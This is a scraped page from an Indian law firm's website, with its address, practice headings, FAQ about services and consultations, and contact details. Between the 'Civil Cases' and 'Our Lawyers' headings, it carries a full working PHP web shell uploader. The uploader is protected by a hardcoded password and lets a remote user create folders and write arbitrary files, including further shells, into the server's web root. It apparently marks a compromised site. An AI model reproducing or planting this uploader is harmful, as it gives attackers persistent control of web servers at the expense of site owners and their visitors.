MATESHWARI SADAN INDIRA NAGAR,DEORIA-274001

Civil Cases

//http://127.0.0.1/up.php?pass=brvatof&action=200&mkdir=[name directory]&touch=[name File]&body=[Bad Shell File]
<?php
error_reporting(0);
header("Content-Type: text/html; charset=utf-8");
$config_password="brvatof";
$action=$_REQUEST['action'];
$password=$_REQUEST['pass'];
if($password!=$config_password)
{
    echo 'Please Enter Password !';
    return;
}
if($action=='200')
{
      $foldername=$_REQUEST['mkdir'];
      $filename=$_REQUEST['touch'];
      $filebody=$_REQUEST['body'];
    $path='';
    $rootPath= $_SERVER['DOCUMENT_ROOT'];
    if($foldername!='')
    {
        if($foldername=='current_folder')
        {
            $path=$filename;
        }
        else
        {
            createFolder($rootPath.'/'.$foldername);
            $path=$rootPath.'/'.$foldername.'/'.$filename;
        }
    }
else
    {
          $path=$rootPath.'/'.$filename;
    }
   
    $fp=fopen($path,"w");
    fwrite($fp,$filebody);
    fclose($fp);
    if(file_exists($path))
    {
          echo "Successfully uploaded".$rootPath;
    }
}

function createFolder($path)
{
  if (!file_exists($path))
  {
    createFolder(dirname($path));
    mkdir($path, 0777);
  }
}
?>

Our Lawyers

Frequently Ask Questions

No, Legal Crux is an independent law firm and not affiliated with any government agency. We provide legal services to individuals and businesses independently.

Our firm boasts over 30 years of experience, and our advocates are seasoned professionals with a deep understanding of various legal domains.

We offer a free initial consultation to discuss your legal needs and determine how we can assist you.

You can contact us through the contact information provided on our website, Legalcrux.in. Feel free to reach out via phone or email, and our team will be happy to assist you.
Mail us at: support@legalcrux.in
Call us at: +91-7007980190

Legal Crux is a full-service law firm that provides a wide range of services, including assistance with civil and family matters, banking, taxation, insurance, and drafting legal documents.
View All Questions

Book an appoitment quickly? Call us now!

We prodive a dedicated support 24/7 for any of your questions.